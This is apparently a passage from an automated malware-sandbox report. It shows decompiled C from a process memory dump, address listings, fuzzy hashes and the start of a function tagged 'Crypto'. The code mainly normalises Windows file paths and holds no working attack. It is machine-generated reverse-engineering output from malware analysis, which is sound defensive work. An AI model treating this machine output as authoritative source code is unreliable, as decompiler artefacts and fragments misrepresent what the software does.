														E1E3D9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x1e381080;
														_v72 =  *0x1e381080;
														__eax =  *0x1e381084;
														_v68 =  *0x1e381084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E1E3D9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E1E3C746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E1E3EB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                  0x1e3c6e30
                                  0x1e3c6e35
                                  0x1e3c6e37
                                  0x1e3c6e3c
                                  0x1e3c6e47
                                  0x1e3c6e4b
                                  0x1e3c6e50
                                  0x1e3c6e53
                                  0x1e3c6e55
                                  0x1e3c6e5b
                                  0x1e3c6e5f
                                  0x1e3c6e65
                                  0x1e3c6e68
                                  0x1e3c6e6a
                                  0x1e3c6e6d
                                  0x1e3c6e70
                                  0x1e3c6e73
                                  0x1e3c6e76
                                  0x1e3c6e79
                                  0x1e3c6e7c
                                  0x1e3c6e7f
                                  0x1e3c6e84
                                  0x1e3c710f
                                  0x1e3c710f
                                  0x1e3c6e8c
                                  0x1e3c6e8e
                                  0x1e3c6e8e
                                  0x1e3c6e97
                                  0x1e40f5d3
                                  0x1e40f5d3
                                  0x1e3c6e9d
                                  0x1e3c6ea3
                                  0x1e3c6eaa
                                  0x1e3c6ead
                                  0x1e3c6eb2
                                  0x1e3c6eb4
                                  0x1e3c6eb7
                                  0x1e3c7466
                                  0x1e3c7466
                                  0x00000000
                                  0x1e3c6ebd
                                  0x1e3c6ebd
                                  0x1e3c6ec4
                                  0x1e3c6eca
                                  0x1e3c6ecc
                                  0x1e3c6ecf
                                  0x1e3c6ed2
                                  0x1e3c6ede
                                  0x1e40f5df
                                  0x1e40f5e0
                                  0x00000000
                                  0x1e40f5e0
                                  0x1e3c6ee6
                                  0x00000000
                                  0x00000000
                                  0x1e3c6eec
                                  0x1e3c6ef3
                                  0x1e3c7181
                                  0x1e3c6f02
                                  0x1e3c6f02
                                  0x1e3c6f02
                                  0x1e3c6f0b
                                  0x1e3c6f0d
                                  0x1e3c6f10
                                  0x1e3c6f17
                                  0x1e3c6f21
                                  0x1e3c6f24
                                  0x1e3c6f2d
                                  0x1e3c6f31
                                  0x1e3c6f36
                                  0x1e3c6f3d
                                  0x1e3c7413
                                  0x1e3c7416
                                  0x1e3c7419
                                  0x1e3c741c
                                  0x1e3c7421
                                  0x1e3c742b
                                  0x1e3c742b
                                  0x1e3c742e
                                  0x1e3c7439
                                  0x1e40f60b
                                  0x1e40f60b
                                  0x1e40f615
                                  0x1e40f619
                                  0x1e3c743f
                                  0x1e3c7447
                                  0x1e3c7454
                                  0x1e3c745a
                                  0x1e3c745f
                                  0x1e3c745f
                                  0x00000000
                                  0x1e3c7439
                                  0x1e3c7425
                                  0x1e40f5e9
                                  0x1e40f5ed
                                  0x1e40f5f4
                                  0x00000000
                                  0x00000000
                                  0x1e40f5fd
                                  0x00000000
                                  0x00000000
                                  0x1e40f603
                                  0x1e40f603
                                  0x00000000
                                  0x1e3c6f43
                                  0x1e3c6f43
                                  0x1e3c6f45
                                  0x1e3c6f48
                                  0x1e3c6f4e
                                  0x1e3c6f65
                                  0x1e3c6f68
                                  0x1e3c721f
                                  0x1e3c6f83
                                  0x1e3c6f86
                                  0x1e3c72dc
                                  0x1e3c72dc
                                  0x1e3c6f9e
                                  0x1e3c6fa1
                                  0x1e3c6fa3
                                  0x1e3c6fa5
                                  0x1e3c6fa8
                                  0x1e3c6fab
                                  0x1e3c6fae
                                  0x1e3c6fb1
                                  0x1e3c6fb4
                                  0x1e3c6fb6
                                  0x1e3c6fb9
                                  0x1e3c6fbf
                                  0x1e3c718a
                                  0x1e3c718e
                                  0x1e40f831
                                  0x1e40f831
                                  0x1e40f833
                                  0x1e40f836
                                  0x00000000
                                  0x1e40f836
                                  0x1e3c7194
                                  0x00000000
                                  0x1e40f658
                                  0x1e40f658
                                  0x1e40f65a
                                  0x1e40f65d
                                  0x1e40f662
                                  0x1e40f662
                                  0x1e40f665
                                  0x1e40f667
                                  0x00000000
                                  0x00000000
                                  0x1e40f669
                                  0x1e40f66c
                                  0x1e40f670
                                  0x1e40f673
                                  0x1e40f67a
                                  0x1e40f67a
                                  0x1e40f67b
                                  0x1e40f67e
                                  0x1e40f681
                                  0x00000000
                                  0x00000000
                                  0x1e40f683
                                  0x1e40f683
                                  0x00000000
                                  0x1e40f683
                                  0x1e40f675
                                  0x1e40f678
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e40f678
                                  0x1e40f686
                                  0x1e40f688
                                  0x1e40f68b
                                  0x1e40f68e
                                  0x1e40f691
                                  0x1e40f694
                                  0x1e40f698
                                  0x1e40f69c
                                  0x1e40f6a0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c7397
                                  0x1e3c739c
                                  0x1e3c739f
                                  0x1e3c73a3
                                  0x1e3c73a5
                                  0x1e40f6bb
                                  0x1e40f6c1
                                  0x1e40f6c4
                                  0x1e3c73ab
                                  0x1e3c73ab
                                  0x1e3c73ab
                                  0x1e3c73b1
                                  0x1e3c73b5
                                  0x1e3c73ba
                                  0x1e3c73c0
                                  0x1e3c73c3
                                  0x1e3c73c7
                                  0x1e3c73cc
                                  0x1e3c73d0
                                  0x1e3c73d3
                                  0x1e40f6cc
                                  0x1e40f6d4
                                  0x1e40f6d9
                                  0x1e40f6dd
                                  0x1e40f6e1
                                  0x1e40f6e5
                                  0x1e40f6f0
                                  0x1e40f6fc
                                  0x1e40f700
                                  0x1e40f709
                                  0x1e40f70e
                                  0x1e40f710
                                  0x1e40f784
                                  0x1e40f788
                                  0x1e40f78b
                                  0x1e40f78e
                                  0x1e40f790
                                  0x1e40f792
                                  0x1e40f795
                                  0x1e40f798
                                  0x1e40f7b7
                                  0x1e40f7b7
                                  0x1e40f7ba
                                  0x1e40f7ba
                                  0x00000000
                                  0x1e40f7ba
                                  0x1e40f79a
                                  0x1e40f79d
                                  0x00000000
                                  0x00000000
                                  0x1e40f79f
                                  0x1e40f7a4
                                  0x1e40f7a7
                                  0x1e40f7ab
                                  0x1e40f7ae
                                  0x1e40f7b1
                                  0x00000000
                                  0x1e40f7b1
                                  0x1e40f712
                                  0x1e40f717
                                  0x1e40f74c
                                  0x1e40f74e
                                  0x1e40f752
                                  0x1e40f756
                                  0x1e40f75d
                                  0x1e40f761
                                  0x1e40f764
                                  0x1e40f76c
                                  0x1e40f771
                                  0x1e40f775
                                  0x1e40f778
                                  0x1e40f77c
                                  0x00000000
                                  0x1e40f77c
                                  0x1e40f719
                                  0x1e40f71d
                                  0x1e40f720
                                  0x1e40f723
                                  0x1e40f726
                                  0x1e40f729
                                  0x1e40f72e
                                  0x1e40f740
                                  0x1e40f744
                                  0x00000000
                                  0x1e40f744
                                  0x1e40f730
                                  0x1e40f732
                                  0x1e40f735
                                  0x1e40f738
                                  0x00000000
                                  0x1e3c73d9
                                  0x1e3c73d9
                                  0x1e3c73db
                                  0x1e3c73de
                                  0x1e3c73e1
                                  0x1e3c73e4
                                  0x1e3c73e7
                                  0x1e3c73ea
                                  0x1e3c73ef
                                  0x1e3c73f2
                                  0x1e3c73f6
                                  0x1e3c73f9
                                  0x1e3c73f9
                                  0x1e3c73fe
                                  0x1e3c7401
                                  0x1e3c7406
                                  0x1e3c7409
                                  0x00000000
                                  0x1e3c7409
                                  0x00000000
                                  0x1e40f7c5
                                  0x1e40f7ca
                                  0x1e40f7cd
                                  0x1e40f7d1
                                  0x1e40f7d3
                                  0x1e40f7da
                                  0x1e40f7e0
                                  0x1e40f7e3
                                  0x1e40f7e3
                                  0x1e40f7e6
                                  0x1e40f7d5
                                  0x1e40f7d5
                                  0x1e40f7d5
                                  0x1e40f7e9
                                  0x1e40f7eb
                                  0x1e40f7f0
                                  0x1e40f7f3
                                  0x1e40f7f5
                                  0x1e40f7f8
                                  0x1e40f7fb
                                  0x1e40f7fe
                                  0x1e40f801
                                  0x1e40f80f
                                  0x1e40f814
                                  0x1e40f803
                                  0x1e40f803
                                  0x1e40f806
                                  0x1e40f806
                                  0x00000000
                                  0x00000000
                                  0x1e3c719d
                                  0x1e3c71a2
                                  0x1e3c71a5
                                  0x1e3c71a9
                                  0x1e3c71ab
                                  0x1e40f826
                                  0x1e40f829
                                  0x1e3c71b1
                                  0x1e3c71b1
                                  0x1e3c71ba
                                  0x1e3c71ba
                                  0x1e3c71bf
                                  0x1e3c71c5
                                  0x1e3c71cf
                                  0x1e3c71d2
                                  0x1e3c71d8
                                  0x1e3c71dd
                                  0x1e3c71e4
                                  0x1e3c71e7
                                  0x00000000
                                  0x00000000
                                  0x1e3c7275
                                  0x1e3c727a
                                  0x1e3c727d
                                  0x1e3c727f
                                  0x1e3c7282
                                  0x1e3c7284
                                  0x1e40f6a8
                                  0x1e40f6aa
                                  0x1e40f6aa
                                  0x1e3c728a
                                  0x1e3c728f
                                  0x1e3c7292
                                  0x1e3c7297
                                  0x1e3c729a
                                  0x1e3c729d
                                  0x1e3c72a0
                                  0x1e3c72a5
                                  0x1e3c72a9
                                  0x1e3c72ac
                                  0x1e3c72af
                                  0x1e3c72b2
                                  0x1e3c72b5
                                  0x1e3c72b7
                                  0x1e3c72ba
                                  0x1e3c72be
                                  0x1e3c72be
                                  0x1e3c72c2
                                  0x1e3c72c5
                                  0x1e3c72c8
                                  0x1e40f6b2
                                  0x1e40f6b2
                                  0x00000000
                                  0x00000000
                                  0x1e3c6fc5
                                  0x1e3c6fc5
                                  0x1e3c6fcc
                                  0x1e3c6fd8
                                  0x1e3c6fda
                                  0x1e3c6fdd
                                  0x1e3c6fe3
                                  0x1e3c7162
                                  0x1e40f845
                                  0x00000000
                                  0x00000000
                                  0x1e40f84e
                                  0x1e40f8c4
                                  0x1e40f8c8
                                  0x1e40f8cb
                                  0x1e40f8ce
                                  0x1e3c70e0
                                  0x1e3c70e0
                                  0x1e3c70e3
                                  0x1e3c70e3
                                  0x1e3c70ea
                                  0x1e3c70ef
                                  0x1e3c70f1
                                  0x1e3c70f4
                                  0x1e3c70fc
                                  0x1e3c70fd
                                  0x1e3c70fe
                                  0x1e3c710c
                                  0x1e3c710c
                                  0x1e40f850
                                  0x1e40f858
                                  0x1e40f87a
                                  0x1e40f88a
                                  0x1e40f88d
                                  0x1e40f890
                                  0x1e40f893
                                  0x1e40f895
                                  0x1e40f898
                                  0x1e40f8a4
                                  0x1e40f8ad
                                  0x1e40f8b0
                                  0x1e40f8b3
                                  0x1e40f8b3
                                  0x1e40f8a4
                                  0x1e3c6fec
                                  0x1e3c6fec
                                  0x1e3c6fee
                                  0x00000000
                                  0x1e3c6ff1
                                  0x1e3c6ff8
                                  0x00000000
                                  0x1e3c6ffe
                                  0x1e3c7004
                                  0x1e3c7006
                                  0x1e3c7006
                                  0x1e3c7010
                                  0x1e3c7017
                                  0x1e3c701e
                                  0x1e3c7072
                                  0x1e3c7074
                                  0x1e3c707e
                                  0x1e3c7083
                                  0x1e3c7087
                                  0x1e3c7088
                                  0x1e3c706c
                                  0x1e3c706c
                                  0x1e3c706d
                                  0x00000000
                                  0x1e3c706d
                                  0x1e3c707c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c707c
                                  0x1e3c7020
                                  0x1e3c7023
                                  0x1e3c71ef
                                  0x1e3c71ef
                                  0x1e3c71f2
                                  0x1e3c71f7
                                  0x00000000
                                  0x00000000
                                  0x1e3c71fd
                                  0x1e3c7200
                                  0x1e3c7205
                                  0x1e3c720b
                                  0x1e3c720e
                                  0x1e3c72eb
                                  0x00000000
                                  0x00000000
                                  0x1e3c72f6
                                  0x00000000
                                  0x1e3c7030
                                  0x1e3c7037
                                  0x1e3c703e
                                  0x1e3c7055
                                  0x1e3c705a
                                  0x1e3c7062
                                  0x1e40f908
                                  0x1e40f90e
                                  0x1e40f90f
                                  0x1e40f90f
                                  0x1e40f908
                                  0x1e3c7062
                                  0x1e3c705a
                                  0x00000000
                                  0x1e3c7045
                                  0x1e3c7045
                                  0x1e3c7049
                                  0x1e3c704a
                                  0x1e3c704d
                                  0x1e3c704e
                                  0x00000000
                                  0x1e3c704e
                                  0x1e3c703e
                                  0x1e3c7068
                                  0x1e3c7069
                                  0x00000000
                                  0x1e3c7069
                                  0x1e3c72fc
                                  0x1e3c7301
                                  0x1e3c7304
                                  0x1e3c7314
                                  0x1e3c7314
                                  0x1e3c7319
                                  0x00000000
                                  0x00000000
                                  0x1e3c7325
                                  0x1e3c732d
                                  0x1e3c7330
                                  0x1e3c7356
                                  0x1e3c7357
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c7332
                                  0x1e3c7332
                                  0x1e3c7337
                                  0x00000000
                                  0x00000000
                                  0x1e3c7343
                                  0x1e3c734b
                                  0x1e3c734e
                                  0x1e3c7361
                                  0x00000000
                                  0x00000000
                                  0x1e3c7367
                                  0x1e3c7367
                                  0x1e3c7368
                                  0x00000000
                                  0x1e3c7368
                                  0x1e3c7350
                                  0x1e3c7351
                                  0x1e3c7351
                                  0x00000000
                                  0x1e3c7332
                                  0x1e40f8f9
                                  0x1e40f8f9
                                  0x1e40f8fa
                                  0x00000000
                                  0x1e40f8fa
                                  0x1e3c7306
                                  0x1e3c730e
                                  0x1e40f8ee
                                  0x00000000
                                  0x00000000
                                  0x1e40f8f4
                                  0x00000000
                                  0x1e3c730e
                                  0x1e3c7214
                                  0x1e3c7214
                                  0x1e3c7217
                                  0x00000000
                                  0x1e3c7217
                                  0x1e3c702c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c702c
                                  0x1e3c708d
                                  0x1e3c7094
                                  0x1e3c7098
                                  0x1e3c70a0
                                  0x1e3c738c
                                  0x1e3c738d
                                  0x1e3c738d
                                  0x1e3c70a0
                                  0x1e3c7098
                                  0x1e3c70a6
                                  0x1e3c70ab
                                  0x1e3c70b3
                                  0x1e3c70b5
                                  0x1e3c70cd
                                  0x1e3c70cd
                                  0x1e3c70d0
                                  0x1e3c70d8
                                  0x1e3c711a
                                  0x1e3c711c
                                  0x1e3c711c
                                  0x1e3c7121
                                  0x00000000
                                  0x00000000
                                  0x1e3c7129
                                  0x00000000
                                  0x00000000
                                  0x1e3c712b
                                  0x1e3c712b
                                  0x1e3c7130
                                  0x1e3c737e
                                  0x1e3c7381
                                  0x00000000
                                  0x1e3c7381
                                  0x1e3c7138
                                  0x00000000
                                  0x00000000
                                  0x1e3c7144
                                  0x1e3c7144
                                  0x1e3c70da
                                  0x1e3c70da
                                  0x1e3c70dd
                                  0x00000000
                                  0x1e3c70dd
                                  0x1e3c70b7
                                  0x1e3c70b8
                                  0x1e3c70bb
                                  0x1e3c70c2
                                  0x00000000
                                  0x00000000
                                  0x1e3c70c7
                                  0x00000000
                                  0x00000000
                                  0x1e3c70c9
                                  0x1e3c70ca
                                  0x00000000
                                  0x1e3c70ad
                                  0x1e3c70ad
                                  0x1e3c70af
                                  0x00000000
                                  0x1e3c70af
                                  0x1e3c7148
                                  0x1e3c714d
                                  0x1e40f8e2
                                  0x1e40f8e2
                                  0x1e3c7153
                                  0x1e3c7154
                                  0x1e3c7157
                                  0x00000000
                                  0x1e3c7157
                                  0x1e40f87c
                                  0x1e40f87f
                                  0x1e40f882
                                  0x00000000
                                  0x1e40f882
                                  0x1e40f85e
                                  0x00000000
                                  0x00000000
                                  0x1e40f864
                                  0x1e40f869
                                  0x1e40f86c
                                  0x00000000
                                  0x1e40f86c
                                  0x1e3c7168
                                  0x1e3c7170
                                  0x1e40f8d6
                                  0x1e40f8d6
                                  0x1e3c7176
                                  0x1e3c7179
                                  0x00000000
                                  0x1e3c7179
                                  0x1e3c6fe9
                                  0x1e3c6fe9
                                  0x00000000
                                  0x1e3c6fe9
                                  0x1e3c6fbf
                                  0x1e3c6f8c
                                  0x1e3c6f93
                                  0x1e3c72d6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c72d6
                                  0x1e3c6f99
                                  0x1e3c6f99
                                  0x1e3c6f99
                                  0x00000000
                                  0x1e3c6f68
                                  0x1e3c6f50
                                  0x1e3c6f56
                                  0x1e3c722c
                                  0x1e40f629
                                  0x1e40f629
                                  0x00000000
                                  0x1e40f629
                                  0x1e3c7232
                                  0x1e3c7239
                                  0x1e40f623
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e40f623
                                  0x1e3c723f
                                  0x1e3c7242
                                  0x1e40f64e
                                  0x1e40f64e
                                  0x00000000
                                  0x1e40f64e
                                  0x1e3c7248
                                  0x1e3c724f
                                  0x1e3c7373
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c7379
                                  0x1e3c7255
                                  0x1e3c7258
                                  0x1e40f63c
                                  0x1e40f648
                                  0x00000000
                                  0x1e40f648
                                  0x1e3c725e
                                  0x1e3c7265
                                  0x1e40f636
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e40f636
                                  0x1e3c726b
                                  0x1e3c726b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c6f56
                                  0x1e3c6f3d
                                  0x1e3c6ed2
                                  0x00000000
                                  0x1e3c6ec4

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
                                  • Instruction ID: f20ac5a1e9a6253d37313d1204386e45cc3efbb22e9c79a707fb6e88634d4e77
                                  • Opcode Fuzzy Hash: e4f3f1333a6b7045ddd3406b43c66c3274ad1e15d379a113b8c7713791bb22cc
                                  • Instruction Fuzzy Hash: C2027B71D142698BCB25CFA9C4906ADB7B6BF44700F21436FE816AB294E770DC92CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3C4120, Relevance: .4, Instructions: 444COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E1E3C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1e49d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E1E3DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E1E3C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L1E3C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E1E3C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
